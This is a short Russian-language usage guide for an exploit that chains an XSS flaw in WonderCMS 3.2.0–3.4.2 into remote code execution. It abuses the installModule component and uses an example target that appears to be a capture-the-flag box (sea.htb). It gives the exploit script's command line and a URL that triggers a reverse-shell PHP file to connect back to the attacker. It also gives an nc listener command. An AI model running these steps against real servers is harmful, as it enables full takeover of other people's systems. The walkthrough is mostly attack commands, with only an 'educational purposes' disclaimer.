
Xss-инъекция, WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 - v3.4.2 уязвима. Удалённые злоумышленники могут получить полный контроль над сервером с помощью эксплуатации межсайтового скриптинга (Cross-Site Scripting, XSS) (только в образовательных целях). Вот план действий:
Эксплойт злоупотребляет компонентом installModule в WonderCMS, чтобы внедрить специально созданный скрипт, выполняющий произвольный код.
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
Пример
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
Если reverse shell не срабатывает автоматически, просто перейдите по адресу:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
Не забудьте запустить слушатель с помощью следующей команды:
nc -lvp 4444
prodigiousMind за обнаружение и сообщение об уязвимости https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413